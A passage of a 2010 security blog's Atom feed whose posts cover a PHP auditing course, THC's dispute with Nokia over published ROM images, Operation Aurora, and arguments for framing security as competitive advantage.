src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/S_vNLYKgjZI/AAAAAAAAAp8/h3aNmKusVTs/s72-c/osstmm_blue_200.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4529593866970876107</id><published>2010-05-22T15:26:00.002+08:00</published><updated>2010-05-22T15:30:41.380+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>PHP Security Course</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_zPPJaS3LoQM/S_eHhVAc_hI/AAAAAAAAAp0/FRT-WHXuGL4/s1600/mopb-logo.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 147px; height: 96px;" src="http://3.bp.blogspot.com/_zPPJaS3LoQM/S_eHhVAc_hI/AAAAAAAAAp0/FRT-WHXuGL4/s200/mopb-logo.png" alt="" id="BLOGGER_PHOTO_ID_5473992878736604690" border="0" /&gt;&lt;/a&gt;PHP Security Course – Advanced PHP Auditing at Source and Bytecode level&lt;br /&gt;&lt;br /&gt;Two weeks after the Month of PHP Security closes Stefan Esser will teach an advanced PHP security course at the SyScan Singapore security conference.&lt;br /&gt;&lt;br /&gt;The course will cover advanced methods and techniques for PHP applications audits at source code and at bytecode level. The students will get to know the most common PHP security problems and how to find them at source code and bytecode level. Throughout the course several free and open source software tools will be introduced and used in order to visualize application structure, find security problems with static and dynamic analysis on source code and bytecode level and also to break PHP bytecode encryption.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4529593866970876107?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4529593866970876107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4529593866970876107' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4529593866970876107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4529593866970876107'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/05/php-security-course.html' title='PHP Security Course'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/S_eHhVAc_hI/AAAAAAAAAp0/FRT-WHXuGL4/s72-c/mopb-logo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5548161454533489136</id><published>2010-05-22T14:55:00.006+08:00</published><updated>2010-05-22T15:11:13.271+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>THC and The Nokia Rom Images</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/S_eDgQHZXQI/AAAAAAAAAps/_6i2tJOSLYQ/s1600/topTHCLogo.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 150px; height: 150px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/S_eDgQHZXQI/AAAAAAAAAps/_6i2tJOSLYQ/s200/topTHCLogo.jpg" alt="" id="BLOGGER_PHOTO_ID_5473988462197169410" border="0" /&gt;&lt;/a&gt;THC and The Nokia Rom Images - 2006-09-06&lt;br /&gt;&lt;br /&gt;In mid july Nokia charged THC with copyright infringement and threatened with a lawsuit. THC took down thc.org to prevent further cost and a legal disaster.&lt;br /&gt;&lt;br /&gt;A month earlier THC discovered significant security flaws in Nokia's Operating System. To proof it THC published ROM images of 3 phones. THC did not publish the source code or tools but one thing became apparent: To extract the ROM images core security features had to be breached. THC's ability to load kernel modules and gain access to the core of the OS (including the GSM stack) was something Nokia did not like.&lt;br /&gt;&lt;br /&gt;At the time of the release THC was not aware of any copyright protected material inside the roms. The question has to be asked if Nokia chosed the right method by threatening THC with a lawsuit or if an email could have achieved the same. Was their concern really copyright infringement? The software in the rom-images could not be used, not be ported and not be run on any other mobile phone. In addition all software is already available on every phone. Phones that are given away by the mobile operators for 1 Euro or sometimes even for free. So if everyone has access to the software anyway what is the point in threatening THC? What was their real intend? We might never find out. But what we know is that they managed to silence THC for a month.&lt;br /&gt;&lt;br /&gt;If this is professional practice? We do not know. It is certainly the practice that Nokia chose. We also know that no attempt was made by Nokia to inquire about the security vulnerability. We also know that Nokia did not provide any updates for their customers.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Making sure that the hardware we purchase is secure is not a crime. In fact taking a look at what we buy should be our duty. We should not trust big corporates who claim in TV advertisements how secure and safe our data is. We have to test it and proof them wrong whenever we can.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;In fact researchers should demand that manufactures like Nokia must provide full documentation of their hardware. The buyer becomes the owner of the mobile phone and thus has the right to know how to program the hardware. Nokia does not provide any of such information. Free software or a different operating system can not be used because of limited access to documentation. This is a classic example of a hardware giant allowing only his own software to be used. This is what some people would consider a Monopoly and an abuse of power.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;THC is deeply concerned that Nokia did not choose the diplomatic route.&lt;br /&gt;&lt;br /&gt;Source: &lt;a href="http://freeworld.thc.org/thc-rom/"&gt;http://freeworld.thc.org/thc-rom/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5548161454533489136?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5548161454533489136/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5548161454533489136' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5548161454533489136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5548161454533489136'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/05/thc-and-nokia-rom-images.html' title='THC and The Nokia Rom Images'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_zPPJaS3LoQM/S_eDgQHZXQI/AAAAAAAAAps/_6i2tJOSLYQ/s72-c/topTHCLogo.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4474948849030597363</id><published>2010-05-21T22:59:00.000+08:00</published><updated>2010-05-21T23:00:09.059+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Something to quote</title><content type='html'>&lt;pre&gt;"Software is like sex. It's better when it's free." -- Linus Torvalds&lt;br /&gt;"A chain is only as strong as its weakest link." -- Charles A. Lindberg&lt;br /&gt;"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK&lt;br /&gt;"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra&lt;br /&gt;"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog&lt;br /&gt;"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle&lt;br /&gt;"There are always errors in real data." -- The AWK Programming Language&lt;br /&gt;"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4474948849030597363?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4474948849030597363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4474948849030597363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4474948849030597363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4474948849030597363'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/05/something-to-quote.html' title='Something to quote'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-184428331552609483</id><published>2010-04-26T20:55:00.003+08:00</published><updated>2010-04-26T21:22:10.329+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Operation Aurora</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/S9WMRRotDNI/AAAAAAAAApM/pRLxfuu-E34/s1600/cyber_warfare.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 211px; height: 126px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/S9WMRRotDNI/AAAAAAAAApM/pRLxfuu-E34/s1600/cyber_warfare.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;b&gt;Operation Aurora&lt;/b&gt; is a &lt;a href="http://en.wikipedia.org/wiki/Cyber_attack" title="Cyber attack" class="mw-redirect"&gt;cyber attack&lt;/a&gt; which began in mid-2009 and  continued through December 2009.&lt;sup id="cite_ref-aurora-still-underway_0-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-aurora-still-underway-0"&gt;&lt;span&gt;[&lt;/span&gt;1&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  The attack was first publicly disclosed by &lt;a href="http://en.wikipedia.org/wiki/Google" title="Google"&gt;Google&lt;/a&gt; on  January 12, 2010, in a &lt;a href="http://en.wikipedia.org/wiki/Blog" title="Blog"&gt;blog&lt;/a&gt; post.&lt;sup id="cite_ref-googleblog_1-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-googleblog-1"&gt;&lt;span&gt;[&lt;/span&gt;2&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  In the blog post, Google said the attack originated in &lt;a href="http://en.wikipedia.org/wiki/People%27s_Republic_of_China" title="People's Republic of China"&gt;China&lt;/a&gt;. &lt;p&gt;The attack has been aimed at dozens of other organizations, of which &lt;a href="http://en.wikipedia.org/wiki/Adobe_Systems" title="Adobe Systems"&gt;Adobe  Systems&lt;/a&gt;,&lt;sup id="cite_ref-2" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-2"&gt;&lt;span&gt;[&lt;/span&gt;3&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  &lt;a href="http://en.wikipedia.org/wiki/Juniper_Networks" title="Juniper  Networks"&gt;Juniper Networks&lt;/a&gt;&lt;sup id="cite_ref-3" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-3"&gt;&lt;span&gt;[&lt;/span&gt;4&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  and &lt;a href="http://en.wikipedia.org/wiki/Rackspace" title="Rackspace"&gt;Rackspace&lt;/a&gt;&lt;sup id="cite_ref-4" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-4"&gt;&lt;span&gt;[&lt;/span&gt;5&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  have publicly confirmed that they were targeted. According to media  reports, &lt;a href="http://en.wikipedia.org/wiki/Yahoo" title="Yahoo" class="mw-redirect"&gt;Yahoo&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Symantec" title="Symantec"&gt;Symantec&lt;/a&gt;,  &lt;a href="http://en.wikipedia.org/wiki/Northrop_Grumman" title="Northrop  Grumman"&gt;Northrop Grumman&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Dow_Chemical" title="Dow Chemical" class="mw-redirect"&gt;Dow Chemical&lt;/a&gt;&lt;sup id="cite_ref-wapo_5-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-wapo-5"&gt;&lt;span&gt;[&lt;/span&gt;6&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  were also among the targets.&lt;/p&gt; &lt;p&gt;As a result of the attack, Google stated in its blog that it plans to  operate a completely &lt;a href="http://en.wikipedia.org/wiki/Google_and_censorship" title="Google  and censorship"&gt;uncensored&lt;/a&gt; version of its search engine in China  "within the law, if at all", and acknowledged that if this is not  possible it may leave China and close its Chinese offices.&lt;sup id="cite_ref-googleblog_1-1" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-googleblog-1"&gt;&lt;span&gt;[&lt;/span&gt;2&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;  Official Chinese media responded stating that the incident is part of a  U.S. government conspiracy.&lt;sup id="cite_ref-financialtimes_6-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-financialtimes-6"&gt;&lt;span&gt;[&lt;/span&gt;7&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt; &lt;p&gt;The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice  President of Threat Research at cyber security company &lt;a href="http://en.wikipedia.org/wiki/McAfee" title="McAfee"&gt;McAfee&lt;/a&gt;.  Research by McAfee Labs discovered that “Aurora” was part of the &lt;a href="http://en.wikipedia.org/wiki/Path_%28computing%29" title="Path  (computing)"&gt;file path&lt;/a&gt; on the attacker’s machine that was included  in two of the &lt;a href="http://en.wikipedia.org/wiki/Malware" title="Malware"&gt;malware&lt;/a&gt; &lt;a href="http://en.wikipedia.org/wiki/Binary_file" title="Binary file"&gt;binaries&lt;/a&gt;  McAfee said were associated with the attack. "We believe the name was  the internal name the attacker(s) gave to this operation," McAfee Chief  Technology Officer George Kurtz said in a blog post.&lt;sup id="cite_ref-mcafeeblog_7-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-mcafeeblog-7"&gt;&lt;span&gt;[&lt;/span&gt;8&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt; &lt;p&gt;According to McAfee, the primary goal of the attack was to gain  access to and potentially modify source code repositories at these high  tech, security and defense contractor companies. “[The SCMs] were wide  open,” says Dmitri Alperovitch, McAfee’s vice president for threat  research. “No one ever thought about securing them, yet these were the  crown jewels of most of these companies in many ways — much more  valuable than any financial or personally identifiable data that they  may have and spend so much time and effort protecting."&lt;sup id="cite_ref-wiredscm_8-0" class="reference"&gt;&lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora#cite_note-wiredscm-8"&gt;&lt;span&gt;[&lt;/span&gt;9&lt;span&gt;]&lt;/span&gt;&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;Source: &lt;a href="http://en.wikipedia.org/wiki/Operation_Aurora"&gt;Wikipedia&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-184428331552609483?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/184428331552609483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=184428331552609483' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/184428331552609483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/184428331552609483'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/04/cyber-attack_26.html' title='Operation Aurora'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_zPPJaS3LoQM/S9WMRRotDNI/AAAAAAAAApM/pRLxfuu-E34/s72-c/cyber_warfare.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1288960754102219140</id><published>2010-03-22T22:21:00.003+08:00</published><updated>2010-03-22T22:35:21.526+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Forget ROI and risk. Consider competitive advantage</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/S6d-iKaqVKI/AAAAAAAAAo0/tWTNZ4QkWyk/s1600-h/taosecurity.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 62px; height: 60px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/S6d-iKaqVKI/AAAAAAAAAo0/tWTNZ4QkWyk/s200/taosecurity.png" alt="" id="BLOGGER_PHOTO_ID_5451464999332107426" border="0" /&gt;&lt;/a&gt;&lt;i&gt;1. "ROI-centric discussion"&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person:&lt;/span&gt; Hello boss.   We need to implement our security program because it has a ROI of $1  million dollars.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss&lt;/span&gt;: You mean if we adopt your program we're  going to earn $1 million dollars?&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person:&lt;/span&gt; No, we'll save  $1 million.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss: &lt;/span&gt;Get out of my office.  Come back after you've  taken a finance class.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;i&gt;2. "Risk-centric discussion"&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security  person:&lt;/span&gt; Hello boss.  We need to implement our security program because  I've calculated our risk to be 1.35.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss: &lt;/span&gt;What does that mean?&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security  guy:&lt;/span&gt;  Hmm, ok I'll leave now.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;i&gt;3. "Competitiveness  discussion"&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person:&lt;/span&gt; Hello boss.  We need to  implement our security program because it will provide a competitive  advantage to our businesses.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss:&lt;/span&gt; That's a new one.  Tell me  more.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person: &lt;/span&gt;We have adversaries who try to steal, and  sometimes do steal, our data.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss:&lt;/span&gt; So what.  Isn't it just World  of Warcraft credentials?&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person:&lt;/span&gt; Our adversaries steal  intellectual property like design plans, pricing data, negotiation  strategies, and other information which means they might understand our  business as well as we do.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss:&lt;/span&gt; Is that true?  You mean we could  lose deals because our products are copied, our bids undercut, our  positions already known?  I wonder if that's why we lost a deal to  MegaCorp last month...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Security person:&lt;/span&gt; Now that you mention it,  here is a report on suspicious computer activity involving MegaCorp last  week.  Our team managed to interdict their theft attempt, but in the  future we'd like to be able to detect and respond faster, as well as  make it more difficult for the adversary to have a chance to steal our  information.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Boss:&lt;/span&gt; Now you're talking.  Sit down, let's discuss  this.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;"Notice what happened here.  Magazines written for CIOs,  CTOs, CISOs, and so on constantly advocate "speaking the language of  the business."  Unfortunately this "language" has been assumed to be  finance.  As a result security people tried to shoehorn their projects  into ROI or ROSI, to laughable results.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; &lt;span style="font-style: italic;"&gt;As we've seen during the  last few years, "risk" has turned out to be a dead end too.  The numbers  mean nothing.  Even if you could somehow measure risk, it's easy enough  for managers to accept a higher level of risk than the security  manager.  &lt;/span&gt;  &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;Competitiveness, on the other hand, is everything to  business people.  They are constantly looking for an edge.  It a tight  economy, gaining an advantage over the competition could mean the  difference between thriving or going out of business.&lt;/span&gt;  &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;Notice that  discussing competitiveness also avoids the death spiral associated with  ROI discussions: cost.  When conversation is ROI-centric, digital  security is perceived as being a loss prevention exercise and a cost  center.  IT in general is often seen in this light.  Don't dump money in  a cost center -- cut spending instead!&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;When you turn the focus  on the adversary -- you are &lt;/span&gt;&lt;b style="font-style: italic;"&gt;threat-centric&lt;/b&gt;&lt;span style="font-style: italic;"&gt;  -- and discuss how he  is trying to beat you and how you can beat him, you are likely to  strike a primal chord in the mind of the business person.  The executive  is likely to wonder "what else can we do to give us a competitive  advantage?"  &lt;/span&gt;&lt;b style="font-style: italic;"&gt;Suddenly the digital security shop is seen as a business  partner in a common fight with the competition, not a cost center  dragging down the "productive" elements of the business.&lt;/b&gt;  &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;This  isn't a new idea, but it's largely absent in the mindshare of digital  security professionals.  (If anyone has an ACM account I'd like to read &lt;/span&gt;&lt;a style="font-style: italic;" href="http://portal.acm.org/citation.cfm?id=119505"&gt;Using information  security to achieve competitive advantage&lt;/a&gt;&lt;span style="font-style: italic;"&gt; by Charles Cresson Wood,  1991.)  In addition to mentioning ROI and risk, it's important to  remember that &lt;/span&gt;&lt;b style="font-style: italic;"&gt;compliance&lt;/b&gt;&lt;span style="font-style: italic;"&gt; is the other driver that is likely to  justify funding.  However, I believe we are more likely to see security  shops spending resources explaining why their current activities meet  regulatory requirements.  I doubt new programs are going to be created  to meet compliance needs, since compliance is basically a ten-year-old  justification at this point."&lt;br /&gt;&lt;br /&gt;- source &lt;a href="http://taosecurity.blogspot.com/"&gt;taosecurity&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1288960754102219140?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1288960754102219140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1288960754102219140' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1288960754102219140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1288960754102219140'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/03/forget-roi-and-risk-consider.html' title='Forget ROI and risk. Consider competitive advantage'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_zPPJaS3LoQM/S6d-iKaqVKI/AAAAAAAAAo0/tWTNZ4QkWyk/s72-c/taosecurity.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3625562585442736267</id><published>2010-03-10T22:18:00.000+08:00</published><updated>2010-03-11T21:16:00.108+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Advice for Academic Researchers</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/S5jskCeJVGI/AAAAAAAAAoo/Eh49vBeztbU/s1600-h/taosecurity.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 62px; height: 60px;" src="http://4.bp.blogspot.com/_zPPJaS3LoQM/S5jskCeJVGI/AAAAAAAAAoo/Eh49vBeztbU/s200/taosecurity.png" alt="" id="BLOGGER_PHOTO_ID_5447363853187372130" border="0" /&gt;&lt;/a&gt;Quoted from TaoSecurity Blog's&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;A blog and book reader emailed the following question:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;i style="font-style: italic;"&gt;I am an info sec undergrad and have been granted a scholarship to continue my studies towards a phd with the promise of DoD service at the other end. It is critical for me to research and select the most important area of security from the Defense Department's perspective.&lt;br /&gt;&lt;br /&gt;My question to you is this: Drawing upon your knowledge, what specific area(s) of information security do you feel will be most critical in the next several years (especially in the eyes of the Dept. of Defense)?&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;I post this question because I'm sure blog readers will contribute interesting comments. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;For my part, I'm really interested in the following: characterizing network traffic. In other words, develop tools and techniques to &lt;/span&gt;&lt;b style="font-style: italic;"&gt;describe what is happening on the network&lt;/b&gt;&lt;span style="font-style: italic;"&gt;. (I'm sure a few commercial vendors think they are doing this already, but nothing approaches the level that we really need.)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Without understanding what is happening, we can't decide if the activity is normal, suspicious, or malicious. Current approaches are far too primitive and limited. This work is not as "shiny" as developing a new detection algorithm, but getting back to basics is the sort of approach that could survive in a research environment. &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3625562585442736267?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3625562585442736267/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3625562585442736267' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3625562585442736267'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3625562585442736267'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2010/01/advice-for-academic-researchers.html' title='Advice for Academic Researchers'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_zPPJaS3LoQM/S5jskCeJVGI/AAAAAAAAAoo/Eh49vBeztbU/s72-c/taosecurity.png' height='72' 